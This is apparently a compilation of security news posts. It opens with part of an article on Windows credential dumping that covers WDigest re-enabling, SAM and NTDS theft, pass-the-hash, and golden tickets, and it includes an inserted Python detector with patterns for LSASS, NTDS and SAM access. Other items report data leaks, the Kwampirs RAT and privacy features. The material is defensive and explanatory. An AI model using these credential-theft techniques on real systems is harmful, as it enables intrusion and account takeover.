While these are popular methods for stealing credentials, they aren’t the only options. Once an attacker gains access to a system, there is a veritable gold mine of credentials on it that they can attempt to access. This is where a technique called credential dumping comes in. End users may not be aware of it, but credential dumping is a wildly popular technique whereby an attacker scours a compromised computer for credentials in order to move laterally and/or carry out further attacks. Users may be familiar with headlines touting phishing or keylogging attacks, while credential dumping receives far less widespread attention; that only underscores the importance of understanding the attack method.

Credential dumping

There are a variety of places within operating systems where credentials are stored for use in everyday operation. If an attacker can gain access to a particular system, they can attempt to locate, copy, and “dump” the credentials.

Credential dumping is possible mainly because software and operating systems have worked to reduce the number of times a user is required to enter their password. To do that, operating systems keep passwords, password hashes, and other derived secrets such as tickets in memory, databases, or files. The idea is that the operating system asks for the password once, then reuses the cached credential for successive logins in the short term, saving the user from having to enter it again.

Tools of the trade

Problems arise when an attacker gains privileged access to a computer. If the attacker can execute code with administrative or SYSTEM rights, they can extract credentials from memory with various credential dumping tools. There are several tools an attacker can wield to steal credentials in these cases. Tools like gsecdump, creddump, and PWDumpX can be used in a variety of ways to steal credentials.

However, the most popular credential dumping tool by far is Mimikatz. Developed in 2007 by Benjamin Delpy, it began as a tool to highlight a flaw in Microsoft Windows Local Security Authority Subsystem Service (LSASS). LSASS stores credentials so that users don’t have to log in repeatedly each time they want to access system resources. While the flaw in question was eventually fixed, Mimikatz evolved to become an important tool for penetration testers and other security professionals to check for credential dumping weaknesses within systems. Unfortunately, it has become a popular tool for malicious actors as well.

Where to steal

An attacker can pull credentials from different areas on a system. With access to a regular endpoint computer, an attacker can look for credentials in the following locations.

  • WDigest
    This is a legacy authentication protocol in Windows. When enabled, LSASS keeps a plain-text copy of each logged-in user’s password in memory. While caching is disabled by default on current versions of Windows, the provider still exists in the latest versions, and attackers often re-enable it (by setting the UseLogonCredential registry value under the WDigest security provider key) and then harvest passwords from the next logons.
  • Security Accounts Manager (SAM)
    This is a database file that has existed in Windows since the NT days. SAM is used to authenticate local accounts, allowing access when the credentials provided match what SAM has on file. The password hashes it holds are encrypted with a key derived from the SYSTEM hive, so if an attacker steals both files they can decrypt the hashes, then crack them offline or use them as-is in pass-the-hash attacks.
  • LSA Secrets
    The Local Security Authority (LSA) manages authentication and the logging in of users on a Windows system, as well as the local security policy for a computer. Sensitive data used by this subsystem is stored in a protected storage area called “LSA secrets.”
  • Kerberos
    The Kerberos protocol was specifically designed for strong, secure authentication. It does so through a ticketing system, granting various permissions to users and services. Attacks against Kerberos generally involve forging or injecting stolen Kerberos tickets to gain access.

    If an attacker manages to get onto a domain controller—the network server responsible for managing authentication on the domain—then there are additional areas where credentials are stored.

  • NTDS
    This is where Active Directory stores information about members of a domain in order to verify users and credentials.
  • Group Policy Preference files
    This Windows feature lets administrators push domain policies that include embedded credentials, for example to set a local account password, making administration easier. These policies are stored in a share called SYSVOL, which any domain user can read, and the embedded passwords can be decrypted by anyone, because Microsoft published the encryption key.
  • DCSync
    Instead of a location, DCSync is a technique where an attacker takes advantage of the way domain controllers replicate with one another. In short, the attacker mimics the behavior of another domain controller through directory replication (DRSUAPI) calls and gets the controller to send over credential hashes that can be used in further attacks. It requires an account holding the replication rights, which is why those rights should be tightly controlled.

Using the credentials

Once an attacker has gathered credentials, how do they use them? It’s pretty straightforward when it comes to user names and passwords captured through phishing or keylogging, or hashes that have been stolen and successfully cracked.

However, not all stolen hashes can be cracked, at least not quickly. You may think that’s the end of the line in these cases. Unfortunately, it’s not. There’s a whole group of attack techniques centered around using these credentials as-is.

For instance, consider that an authenticating server generally does not store passwords at all, only a one-way hash of each one (on Windows, the NT hash). Hashing is not encryption: the server never decrypts anything. When you log in, it either hashes the password you supply and compares the result with the hash on file, or, in challenge-response schemes such as NTLM, checks a value that both sides compute from the stored hash and a fresh challenge. Either way, if there’s a match, access is granted.

The challenge-response case is the weakness. If an attacker steals a user’s hash but can’t crack it, they don’t need to: the exchange only ever requires the hash, so the attacker can compute a valid response directly from it and be granted access. This technique is called “passing the hash.”

There are a number of similar authentication attacks. For instance, an attacker could also dump Kerberos tickets from a compromised system, then use them to attempt to log in in a similar fashion. As a variation of the overall theme, this attack is called “pass the ticket.”

There are plenty of variations out there. With “overpass the hash,” an attacker uses a stolen NT hash as the Kerberos encryption key to request a ticket-granting ticket from the domain controller, then uses that ticket to log into network resources. There are also techniques that produce “golden” and “silver” Kerberos tickets: a golden ticket is a ticket-granting ticket forged with the stolen hash of the krbtgt account, and a silver ticket is a service ticket forged with a service account’s hash. As the names suggest, they offer elevated access throughout a network administered by Kerberos, and a golden ticket remains valid until the krbtgt password has been changed twice.

What to do

Fortunately, there are many ways to defend against credential dumping.

  • Monitor access to services like LSASS and databases like SAM.
  • Keep an eye out for command-line arguments used in credential dumping attacks.
  • On domain controllers, monitor logs for unscheduled activity.
  • Look out for unexpected connections from IP addresses not assigned to known domain controllers.
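One way to turn the checklist above into detection logic, as an added example that is not from the Cisco post or any Cisco product: three rules run over constructed process-access, process-create and directory-replication events. The field names, the LSASS allowlist, the sample command lines and the domain controller addresses are all assumptions for illustration and must be tuned to your own telemetry.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Processes that legitimately open a handle to LSASS on a typical Windows host.
# Assumption for the example: build the real list from your EDR/Sysmon baseline.
LSASS_ACCESS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe",
                          "svchost.exe", "msmpeng.exe"}

# Command-line fragments worth an alert: references to the LSASS process or to
# the NTDS / SAM credential stores from anything that is not a known admin tool.
SUSPICIOUS_CMDLINE = [re.compile(p, re.I) for p in
                      (r"lsass(\.exe)?", r"ntds\.dit", r"\\sam\b")]

# Addresses of the real domain controllers (constructed). DCSync-style
# replication requests from any other address are suspicious.
KNOWN_DC_IPS = {ip_address("10.0.0.10"), ip_address("10.0.0.11")}


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_lsass_access(event: Dict) -> Optional[Finding]:
    """Rule 1: a process outside the allowlist opened a handle to lsass.exe."""
    if event.get("kind") != "process_access":
        return None
    if _basename(event["target_image"]) != "lsass.exe":
        return None
    source = _basename(event["source_image"])
    if source in LSASS_ACCESS_ALLOWLIST:
        return None
    return Finding(event["id"], "lsass_access",
                   f"{source} opened lsass.exe (access {event.get('granted_access')})")


def check_cmdline(event: Dict) -> Optional[Finding]:
    """Rule 2: a new process's command line references LSASS, NTDS or SAM."""
    if event.get("kind") != "process_create":
        return None
    # LSASS itself starting at boot mentions lsass.exe; that is not a finding.
    if _basename(event["image"]) == "lsass.exe":
        return None
    cmdline = event.get("cmdline", "")
    for pattern in SUSPICIOUS_CMDLINE:
        if pattern.search(cmdline):
            return Finding(event["id"], "suspicious_cmdline",
                           f"{_basename(event['image'])} matched /{pattern.pattern}/")
    return None


def check_replication_source(event: Dict) -> Optional[Finding]:
    """Rule 3: directory replication requested from an IP that is not a known DC."""
    if event.get("kind") != "ds_replication":
        return None
    src = ip_address(event["src_ip"])
    if src in KNOWN_DC_IPS:
        return None
    return Finding(event["id"], "replication_from_non_dc",
                   f"{event['account']} requested replication from {src}")


RULES = (check_lsass_access, check_cmdline, check_replication_source)


def detect(events: List[Dict]) -> List[Finding]:
    """Run every rule over every event and collect the findings, in event order."""
    findings = []
    for event in events:
        for rule in RULES:
            finding = rule(event)
            if finding is not None:
                findings.append(finding)
    return findings


# Constructed sample events loosely modelled on Sysmon process events and a
# simplified domain-controller replication log. Not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "process_create", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"id": 2, "kind": "process_access", "target_image": r"C:\Windows\System32\lsass.exe",
     "source_image": r"C:\Users\alice\AppData\Local\Temp\tool.exe",
     "granted_access": "0x1010"},
    {"id": 3, "kind": "process_create", "image": r"C:\Temp\dumper.exe",   # fictional tool
     "cmdline": r"C:\Temp\dumper.exe --target lsass.exe --out C:\Temp\proc.bin"},
    {"id": 4, "kind": "process_create", "image": r"C:\Windows\System32\lsass.exe",
     "cmdline": r"C:\Windows\system32\lsass.exe"},                          # benign boot
    {"id": 5, "kind": "ds_replication", "src_ip": "10.0.0.11", "account": r"CORP\DC02$"},
    {"id": 6, "kind": "ds_replication", "src_ip": "10.0.0.57", "account": r"CORP\alice"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule}: {f.detail}")
```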

The security capabilities found in AMP for Endpoints can continuously analyze and monitor file and process activity. AMP can automatically generate alerts at the first sign of malicious behavior, such as when an attacker attempts to spawn an unauthorized LSASS process, quickly stopping attacks in their tracks before they can cause any further damage.

Of course, if an attacker does manage to steal credentials, using multi-factor authentication (MFA) can prevent the attacker from actually using them to gain access to other systems. Cisco Duo protects your systems by using a second source of validation to verify user identity before granting access.

Even better, combine the powers of AMP and Duo to reduce the attack surface by allowing AMP to notify Duo when an endpoint has potentially been compromised, allowing Duo to automatically block that endpoint from accessing critical apps that Duo is protecting.

A zero-trust strategy can also go a long way to limit or prevent an attacker from moving laterally through a network. Cisco Identity Services Engine simplifies the delivery of consistent, highly secure access control across all network connections. With far-reaching, intelligent sensor and profiling capabilities, ISE can reach deep into the network to deliver superior visibility into who and what are accessing resources, preventing unwanted access as a result.

Enjoyed reading this Threat of the Month? Subscribe to the Threat of the Month blog series and get alerted when new blogs are published. 

The post Stealing passwords with credential dumping appeared first on Cisco Blogs.

42 million records of Iranian users of unofficial Telegram fork leaked online

Security expert Bob Diachenko discovered that 42 million Iranian ‘Telegram’ user IDs and phone numbers have been leaked online.

Comparitech along with the popular researcher Bob Diachenko discovered 42 million Iranian ‘Telegram’ user IDs and phone numbers online.

The accounts belong to Iranian users and come from a third-party version of the Telegram app.

Telegram is the most popular messaging app in Iran, with more than 50 million registered users nationwide. It’s used by dissidents and government opponents because its conversations can’t be eavesdropped on.

Telegram was blocked permanently in early 2018 following local anti-government protests and civil unrest. Since 2018, many users have continued to access it through proxies and VPNs, while others use unofficial third-party forks.

The data was published by a group called “Hunting system” (translated from Farsi) on an unsecured Elasticsearch cluster. The archive was shut down after Diachenko reported the incident to the hosting provider on March 25.


According to Telegram, the data came from an unofficial “fork” of Telegram. This is possible because the popular instant messaging app is open source, which allows third parties to develop their own versions. The availability of unofficial forks of the app is not surprising, because the official Telegram app is frequently blocked in Iran.

“We can confirm that the data seems to have originated from third-party forks extracting user contacts. Unfortunately, despite our warnings, people in Iran are still using unverified apps. Telegram apps are open source, so it’s important to use our official apps that support verifiable builds.” a Telegram spokesperson told Comparitech.

The bad news is that other unauthorized parties might have accessed the data while it was exposed; experts reported that at least one user had posted the data to a hacker forum.

The exposed data poses a serious risk to users in a country like Iran, where a nation-state actor could use it to single out specific individuals who use Telegram (or a fork of it) for surveillance purposes.

The exposed records included user data originating from Iran, such as User account IDs, Usernames, Phone numbers, Hashes, and secret keys.

The experts pointed out that hashes and secret keys can’t be used to access accounts.

“They only work from inside the account to which they belong, according to a Telegram spokesperson.” continues the post.

Below is the timeline of the exposure:

  • March 15: The database was indexed by search engine BinaryEdge
  • March 21: Diachenko discovered the exposed data and began investigating
  • March 24: Diachenko sent an abuse report to the hosting provider
  • March 25: The Elasticsearch cluster was deleted.

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

The post 42 million records of Iranian users of unofficial Telegram fork leaked online appeared first on Security Affairs.

Sensitive Voter Data Exposed by App Used in US Elections


Sensitive information about US voters was left exposed due to a data breach by the voter contact and canvassing app Campaign Sidekick, which is used by the Republican party in election campaigns. The cybersecurity company UpGuard revealed that an unprotected copy of the Campaign Sidekick app’s code was mistakenly left freely available on its website. The breach has since been secured.

Originating during the 2002 election cycle, Campaign Sidekick has been used to help digitalize election campaigning as part of a wider approach by the Democratic and Republican parties to capture, unify, analyze and act on data about US voters. The Campaign Sidekick app helps collate information from interactions that take place with voters during canvassing.

On February 12 2020, UpGuard found that the git directory on app.campaignsidekick.vote was publicly available online. The files were downloaded and discovered to contain some sensitive data, following which the analyst informed Campaign Sidekick of the breach. Following communication between the two organizations, the breach was secured on February 15 2020.

With extensive data analytics now used in election cycles, it is critical that political parties have the most rigorous cybersecurity techniques and practices in place to protect individuals’ data.

“Organizations need to understand the ease with which attackers can access sensitive data by exploiting vulnerable third parties. Political campaign staffs rely on a broad ecosystem of third parties to help them do business, and it only takes one mistake within a single app to expose sensitive voter data,” commented Kelly White, CEO, RiskRecon.

“Any organization involved in maintaining the integrity of elections – from campaign staffs to party officials to state and local election boards – needs to better understand the security practices of all parties in the data chain of custody and hold those parties accountable.”

There have been several high profile election data breaches in recent years, including leaked emails relating to Hillary Clinton’s campaign to run for Senate.

Clarifying the Computer Fraud and Abuse Act

A federal court has ruled that violating a website's terms of service is not "hacking" under the Computer Fraud and Abuse Act.

The plaintiffs wanted to investigate possible racial discrimination in online job markets by creating accounts for fake employers and job seekers. Leading job sites have terms of service prohibiting users from supplying fake information, and the researchers worried that their research could expose them to criminal liability under the CFAA, which makes it a crime to "access a computer without authorization or exceed authorized access."

So in 2016 they sued the federal government, seeking a declaration that this part of the CFAA violated the First Amendment.

But rather than addressing that constitutional issue, Judge John Bates ruled on Friday that the plaintiffs' proposed research wouldn't violate the CFAA's criminal provisions at all. Someone violates the CFAA when they bypass an access restriction like a password. But someone who logs into a website with a valid password doesn't become a hacker simply by doing something prohibited by a website's terms of service, the judge concluded.

"Criminalizing terms-of-service violations risks turning each website into its own criminal jurisdiction and each webmaster into his own legislature," Bates wrote.

Bates noted that website terms of service are often long, complex, and change frequently. While some websites require a user to read through the terms and explicitly agree to them, others merely include a link to the terms somewhere on the page. As a result, most users aren't even aware of the contractual terms that supposedly govern the site. Under those circumstances, it's not reasonable to make violation of such terms a criminal offense, Bates concluded.

This is not the first time a court has issued a ruling in this direction. It's also not the only way the courts have interpreted the frustratingly vague Computer Fraud and Abuse Act.

COVID-19: How Do I Work from Home Securely?

The coronavirus pandemic—the infection officially designated as COVID-19—is causing upheaval across the globe. Aside from the serious economic and public health implications, one very practical impact of shelter-in-place dictums is to force many companies to support remote working where they can. The most recent data tells us that in 2017, eight million Americans worked from home at least some of the week — amounting to around 5% of US workers. However, the events of the past few weeks are driving what is being described in certain sectors as the biggest shift to home working since 9/11.

This will ensure that many companies can continue functioning while helping to achieve social distancing to minimise the spread of the virus. But there are challenges, particularly to smaller businesses who don’t have IT security teams to assist with the transition. Hackers are primed and ready to take advantage of home workers, whose machines and devices may not be as secure as those in the office. There’s also a risk that workers are more distracted by current events when working at home, creating more opportunities for cyber-criminals to strike.

This isn’t just about hackers stealing your personal log-ins and information to sell on the dark web. In a home-working context, corporate data and systems may also be at risk. It takes just one unsecured remote worker to let the bad guys in. The damage they end up doing may be particularly difficult for employers to weather given the extreme economic pressures already on many firms.

With that in mind, therefore, let’s take a look at some of the major threats to home workers and their organizations, and what can be done to keep the hackers at bay.

The main threats

Phishing messages are by far the number one threat to home workers. Cyber-criminals are using widespread awareness of COVID-19, and a desire for more information on the outbreak, to trick users into clicking on malicious links or opening booby-trapped attachments. Many are spoofed to appear as if sent by trusted organizations such as the US Centers for Disease Control and Prevention (CDC) or the World Health Organization (WHO). They may claim to offer more information on the spread of the outbreak, tips on staying safe, and even provide details of how to get a non-existent vaccine online.

If you click through on a malicious link, the next stage of the attack could:

  • Take you to a convincing-looking log-in page (e.g., for Microsoft Outlook, Office 365, or any popular cloud apps) where your username and password could be harvested by hackers. With these, they have a foothold in the organization which could provide the foundation for a serious information-stealing attack.
  • Covertly initiate a malware download. This malware could exploit unpatched vulnerabilities on your computer to infect not just your machine but the entire corporate network it’s connected to, with ransomware, cryptojacking malware, banking trojans, information-stealing threats, and much more.

Brute forcing is another way for hackers to hijack your cloud accounts. They use previously breached username/password combos and run them through automation software to try them across billions of websites and apps. Because users reuse passwords across numerous accounts, the bad guys often get lucky and are able to unlock additional accounts in this way. Home workers using Microsoft Teams, Slack, Zoom and other cloud platforms for collaboration and productivity may be targeted.

Malicious smartphone apps are another threat to home workers. These may be disguised to trick the user into believing they’re downloading a COVID-19 tracker, for example. In reality, it could infect the device with ransomware, info-stealers, or other malware. That device could then spread the same malware to the corporate network, if it is connected to it via the home network.

Smart device threats are also a concern for home workers. More and more of us are investing in smart home devices. From voice assistants to smart speakers, connected refrigerators to smart TVs, it’s estimated that there’ll be as many as 128 million smart homes in the US by the end of this year. However, often these consumer-grade devices don’t have strong built-in protection. They may use weak, factory default passwords and/or contain multiple software vulnerabilities which are rarely patched by the manufacturer, if at all. The risk is that hackers could hijack one or more of these devices and use them as a stepping stone into the home and then corporate network – as we’ve demonstrated in previous research.

Friends and family could also introduce new cyber-threats, as they will also be confined largely to the home. That means they’ll be logging on to the home network with their own mobile devices, which may not be as well protected from threats as they should be. Once again, such threats could spread quickly from the home network to infect the enterprise network if it’s connected without adequate security controls. Another risk is of children using unsecured remote learning platforms, which may offer cybercriminals opportunities to hijack accounts, steal information and spread malware onto the network.

What are the hackers after?

Home workers represent an attractive target in their own right. After all, personal information and log-ins (home banking, Netflix, webmail etc) can be easily sold for a profit on dark web marketplaces. However, organizations represent a much bigger, potentially more lucrative pay day for cyber-criminals. While corporate PCs and networks might be fairly well secured, the rush to support home working may have left gaps the bad guys are keen to exploit.

By first compromising the home worker, and then pivoting through unsecured channels to the corporate network, hackers could spread ransomware, steal sensitive company IPs, infect work networks with crypto-mining malware, or steal large volumes of customer data. They may also look to hijack employees’ corporate email or other accounts as the first part of a multi-stage information-stealing attack. There have even been new warnings of Business Email Compromise (BEC) attacks in which employees (usually those working in the finance department) are contacted by someone posing as a senior exec and ordered to wire business funds to a new bank account.

Working safely at home

With so many techniques at their disposal, it’s easy to imagine that the bad guys have the upper hand. But by putting a few best practices in place, there are things businesses and employees can do today to reduce home working security risks.

Consider the following:

  • User awareness exercises to improve the ability of home workers to spot phishing attacks.
  • Ensure all home workers are outfitted with anti-malware for any devices used for work. Trend Micro Maximum Security is an excellent place to start for PCs and Macs, while Trend Micro Mobile Security can help secure Android and Mobile devices.
  • Require strong, unique passwords for all accounts, stored in a password manager, such as Trend Micro Password Manager.
  • Enhance the above by switching on two-factor authentication for all enterprise accounts that have it (including any cloud platforms).
  • Always use a VPN for communication between home and corporate networks.
  • Ensure staff have a clear route to report any security incidents.
  • Switch on automatic updates for all home computer systems (operating systems and software).
  • Ensure smart home devices are on the latest software version and have strong passwords or 2FA.
  • Use a network security solution like Trend Micro Home Network Security to secure your home network. It not only provides a secure baseline for working at home, with its web and content threat protections; you can block your kids’ use of the internet and YouTube while you’re having conference calls or doing other bandwidth-intensive work on the remotely-accessed corporate network.
  • Tightly enforce endpoint security policies: if possible, only allow work devices to connect to the corporate network, and/or employee devices that have been previously scanned for threats.

We don’t know how long COVID-19 will last. But by adapting to the new reality as quickly as possible, businesses and their home workers can at least close down any security gaps, enabling them to be as productive as possible — while most importantly, staying safe and healthy.

The post COVID-19: How Do I Work from Home Securely? appeared first on .

To Tune Up Your Quantum Computer, Better Call an AI Mechanic

A high-end race car engine needs all its components tuned and working together precisely to deliver top-quality performance. The same can be said about the processor inside a quantum computer, whose delicate bits must be adjusted in just the right way before it can perform a calculation. Who’s the right mechanic for this quantum tuneup job? According to a team that includes scientists at the National Institute of Standards and Technology (NIST), it’s an artificial intelligence, that’s who. The team’s paper in the journal Physical Review Applied outlines a way to teach an AI to make an

FBI warns of nation-state actors using the Kwampirs malware

For the third time in a few weeks, the FBI has issued an alert about supply chain attacks carried out by nation-state actors using the Kwampirs malware.

The FBI has issued an alert about supply chain attacks using the Kwampirs malware as part of a hacking campaign carried out on a global scale by state-sponsored hackers.

The FBI has issued an alert on Monday about state-sponsored hackers using the Kwampirs malware to attack supply chain companies and other industry sectors as part of a global hacking campaign.


“Since at least 2016, the FBI has observed an Advanced Persistent Threat (APT) actor conduct a global network exploitation campaign using the Kwampirs Remote Access Trojan (RAT) and is providing additional, non-technical information in an effort to highlight key objectives of the actor campaign. This information, along with previously released FBI Liaison Alert System (FLASH) messages, is intended to enhance the network defense posture of public and private partners.” reads the alert issued by FBI.

The Kwampirs RAT is a modular RAT worm used as a reconnaissance tool; if a compromised machine contains data of interest, the backdoor “aggressively” spreads to other systems with open network shares.

The RAT was first analyzed by Symantec researchers in April 2018, when the researchers uncovered the activity of a cyber espionage group tracked as Orangeworm that targeted organizations in the healthcare sector.

“The Kwampirs RAT is a modular RAT worm that gains system access to victim machines and networks, with the primary purpose of gaining broad, yet targeted, access to victim companies enable follow-on computer network exploitation (CNE) activities.” continues the alert. “Through victimology and forensic analysis, the FBI found heavily targeted industries include healthcare, software supply chain, energy, and engineering across the United States, Europe, Asia, and the Middle East. Secondary targeted industries include financial institutions and prominent law firms.”

The FBI already published two Flash alerts, one containing YARA rules related to the Kwampirs malware and a complete technical report of the threat.

According to the FBI, the group behind these attacks has been active since 2016, but a report published in 2018 by Symantec revealed that the Orangeworm APT was first spotted in January 2015.

Symantec pointed out that the APT group appears to be focused on the healthcare industry: 40% of the targets belong to this industry.

The FBI confirmed that the APT group broke into target networks belonging to major transnational healthcare companies, hospital organizations, and other organizations in other industries.

“Kwampirs operations against global healthcare entities have been effective, gaining broad and sustained access to targeted entities. Targeted entities range from major transnational healthcare companies to local hospital organizations. The scope of infections has ranged from localized infected machine(s) to enterprise infections. During these campaigns, the Kwampirs RAT performed daily command and control communications with malicious IP addresses and domains that were hard-coded in the Kwampirs RAT malware. The FBI assesses Kwampirs actors gained access to a large number of global hospitals through vendor software supply chain and hardware products. Infected software supply chain vendors included products used to manage industrial control system (ICS) assets in hospitals.” states the FBI.

Another element that emerged from the FBI alert is the similarity between the Kwampirs malware and Disttrack, a wiper also known as Shamoon that was employed in attacks attributed to Iran-linked APT groups.

At this time it is not clear whether the FBI issued the alert following recent attacks targeting healthcare organizations.

Pierluigi Paganini

(SecurityAffairs – FBI, hacking)

The post FBI warns of nation-state actors using the Kwampirs malware appeared first on Security Affairs.

NATO Report Warns of New Authoritarian Chinese Splinternet


Chinese government plans to push through standardization of a new internet architecture could broaden the threat landscape, destabilize security and privacy, and fragment the world wide web, a new NATO report seen by Infosecurity will warn.

First proposed at the UN’s International Telecommunication Union (ITU) last September, the plans call for a replacement to the current TCP/IP model, dubbed “New IP.” They’re being led by Huawei, China’s state-run telcos and the government itself.

Published by the FT, the plans claimed that TCP/IP is broken, incapable of supporting IoT advances, space-terrestrial communications and other innovations coming down the line, such as holographic comms. 

It also points to security vulnerabilities in the current model and claimed its “ubiquitous, universal and better protocolled system” would provide improved security and trust for the internet.

However, an upcoming report from Oxford Innovation Labs (Oxil) for NATO is extremely apprehensive of the plans. China is effectively “creating a perception of necessity” for its new model when in fact TCP/IP is far from completely broken — in fact, it has adapted consistently well to everything thrown at it over the years, it says.

Even worse, the New IP model for a decentralized internet infrastructure (DII) will undermine security and embed “fine-grained controls in the foundations of the network” — ultimately putting more control into the hands of the ISPs.

“New IP would centralize control over the network into the hands of telecoms operators, all of which are either state run or state-controlled in China,” the report authors told Infosecurity. “So, internet infrastructure would become an arm of the Chinese state.”

New IP also includes plans for an object identifier resolution system to replace the current Domain Name System (DNS), ostensibly to improve performance, stability, privacy and security. But Oxil claimed: “The use of alternate technologies for identification on the internet and the DNS would lead to less predictability in cyberspace and new questions around norms and governance.”

It also criticized the New IP plans for distributed ledger technology (DLT), which China claimed is necessary to counter overt centralization of internet architecture, in the hands of IANA, CAs and other bodies.

In the Chinese model, governments are likely to have control over the DLT, thus enabling mass surveillance, Oxil argued.

“It is not uncommon for language of ‘trust’ to replace ‘security’ in Chinese DII-related discussions. This is concerning because it indicates that the principle of ‘security by design’ – at least in the Western context – is not being adopted in DII’s development. In the long-term this could negatively impact cybersecurity globally,” the report claimed.

The plans are being pushed through at pace at an ITU level, with Oxil and other UN delegates alarmed at the speed such radical changes are being proposed, and the impact of global standardization of New IP.

It will “increase the threat landscape by introducing new security uncertainties across the stack” and provide authoritarian governments everywhere with a new model for controlling the populace, Oxil warned.

The fragmentation of the global internet into national, government-run “intranets,” will also undermine the predictability of cyberspace and NATO’s ability to protect and defend its networks, it continued.

“A proliferation of alternate internet technologies will increase the internet’s threat landscape, decrease predictability, and potentially destabilize existing and future norms for responsible state behavior in the online environment,” the report concluded.

Kwampirs threat actor continues to breach transnational healthcare orgs

The Kwampirs (aka Orangeworm) attack group continues to target global healthcare entities in this time of crisis, the FBI has warned. “Targeted entities range from major transnational healthcare companies to local hospital organizations,” the Bureau noted. “The FBI assesses Kwampirs actors gained access to a large number of global hospitals through vendor software supply chain and hardware products. Infected software supply chain vendors included products used to manage industrial control system (ICS) assets in hospitals.” … More

The post Kwampirs threat actor continues to breach transnational healthcare orgs appeared first on Help Net Security.

Privacy Snafu Exposes 42 Million ‘Telegram’ Records


Security researchers have discovered tens of millions of accounts from a third-party version of Telegram that were leaked online in another cloud misconfiguration.

Bob Diachenko and the Comparitech team found the exposed data on March 21. It had been posted to an Elasticsearch cluster, password-free, by a group called “Hunting system” in Farsi.

Although the cluster was deleted on March 25, a day after Diachenko informed the hosting provider, at least one user had apparently already posted it to a hacking forum.

That’s bad news, because the trove contained 42 million records from a third-party version of popular messaging app Telegram. They included user account IDs, phone numbers, names, and hashes and secret keys.

As Telegram has been banned in Iran since anti-government protests in 2018, the database could put users at risk of being singled out by the authorities as having something to hide.

Although the hashes and keys can’t be used to access accounts, third-party hackers could use the other information in financially motivated attacks, warned Comparitech.

“SIM swap attacks are one example. A SIM swap attack occurs when the attacker convinces a phone carrier to move a phone number to a new SIM card, allowing them to send and receive the victim’s SMS messages and phone calls. The attacker could then receive their one-time access verification codes, granting full access to app accounts and messages,” explained privacy advocate, Paul Bischoff.

“Affected users could also be at risk of targeted phishing or scams using the phone numbers in the database.”

This isn’t the first such privacy incident involving messaging users in the country. In 2016, hackers identified the user IDs, phone numbers and one-time verification codes of 15 million Telegram users after activation codes were likely intercepted by phone carriers.

Houseparty Offers $1m for Info on ‘Smear Campaign’


Houseparty is offering $1m for evidence of a suspected smear campaign, after several reports emerged that multiple users had had other online accounts compromised via the video conferencing app.

The platform has become extremely popular over recent weeks as consumers flock online to socialize safely during a time of lockdowns and social distancing.

However, similar reports in UK tabloid media outlets on Monday pointed to social media “hysteria” over Houseparty users claiming that their use of the app had somehow led to other accounts being compromised.

These include PayPal, Spotify, Amazon, Netflix, Instagram and eBay.

“Anyone who’s using the #Houseparty app be super careful. My bank account was hacked today and it has been linked back to the app. Lots of other people are experiencing the same thing. I’d definitely recommend deleting it,” noted one user in a typical post on Twitter.

However, security experts have leaped to Houseparty’s defense, claiming there’s no evidence linking Houseparty to compromises of other accounts. If the stories are true, it’s more than likely that reused passwords are to blame.

Experts recommended users switch to two-factor authentication for log-ins across as many sites as they can, and to use a password manager.

As a result of the outcry, the video conferencing platform said it is now looking at whether these rumors were a coordinated attempt to defame the company.

“We are investigating indications that the recent hacking rumors were spread by a paid commercial smear campaign to harm Houseparty. We are offering a $1m bounty for the first individual to provide proof of such a campaign,” it said on Twitter.

“All Houseparty accounts are safe - the service is secure, has never been compromised, and doesn’t collect passwords for other sites.”

Users have also complained on social media that when they tried to delete the app it required them to re-enter their password, and then claimed it was incorrect.

The MITRE ATT&CK Framework: Execution

Of all the tactics that an adversary will take on in their campaign, none will be more widely abused than Execution (https://attack.mitre.org/wiki/Execution). When taking into consideration off-the-shelf malware, traditional ransomware, or state of the art advanced persistent threat actors, all of them have execution in common. There’s a great quote from Alissa Torres which says, […]… Read More

The post The MITRE ATT&CK Framework: Execution appeared first on The State of Security.

Microsoft Edge will warn users if their credentials have been compromised

Microsoft announced that it will add an alerting feature to Edge to warn users if their credentials saved to autofill have been compromised.

Microsoft announced several new features for its Edge browser, including a new alerting service to warn users if the credentials they have saved to autofill have been compromised in a third-party data breach.

“Today, we’re announcing Password Monitor in Microsoft Edge to help keep your online accounts safe from hackers. When enabled, Password Monitor is a feature that notifies you if the credentials you’ve saved to autofill have been detected on the dark web.” reads the advisory published by Microsoft.

In recent months, credential stuffing attacks have continued to be a growing threat.

Credential stuffing attacks use botnets to try stolen login credentials, usually obtained through phishing attacks and third-party data breaches, against many services. This kind of attack is very efficient because of the bad habit users have of reusing the same password across multiple services.

To prevent threat actors from abusing credentials obtained from third-party data breaches, the Microsoft Password Monitor feature implemented in the Edge web browser will notify users if the password they are entering via autofill has been offered for sale on the dark web.

“If Microsoft Edge uncovers a match with any of your saved username + passwords, you will receive a notification from within the browser prompting you to take action,” continues the announcement. “Through a dashboard in Settings, you can view a list of all leaked credentials and get routed to their respective websites to change your password. Once the password has been changed, save the new credential to autofill and continue browsing with peace of mind knowing that Microsoft Edge and Password Monitor have your back.”

Edge users will be able to view a list of all leaked credentials in the dashboard in Settings, and from there they will be redirected to the respective websites to change their password. Once the password has been changed, users have to save it to autofill so that Password Monitor can alert them if a future security breach exposes their credentials.

The new feature in the Password Monitor will be rolled out to the Insider channels in the next few months.

Other web browsers such as Firefox and Chrome have warned users about compromised passwords since October 2019.

Microsoft also announced the enhancement of the InPrivate browsing mode and a feature to prevent users’ tracking online.

Pierluigi Paganini

(SecurityAffairs – Edge browser, credential stuffing)

The post Microsoft Edge will warn users if their credentials have been compromised appeared first on Security Affairs.

Webinar – Getting Inside the Mind of an Attacker: TLS Attacks and Pitfalls

Transport Layer Security (TLS) is a common cybersecurity protocol that is frequently seen in email, web browsers, messaging, and other communication methods that take place over networks. TLS is relied upon to ensure secrecy using different techniques like encryption, hash functions, and digital signatures. These days, however, nothing is immune to attack, so despite being designed to improve security, threat actors have still managed to find ways to exploit TLS. In this webinar, you’ll learn … More

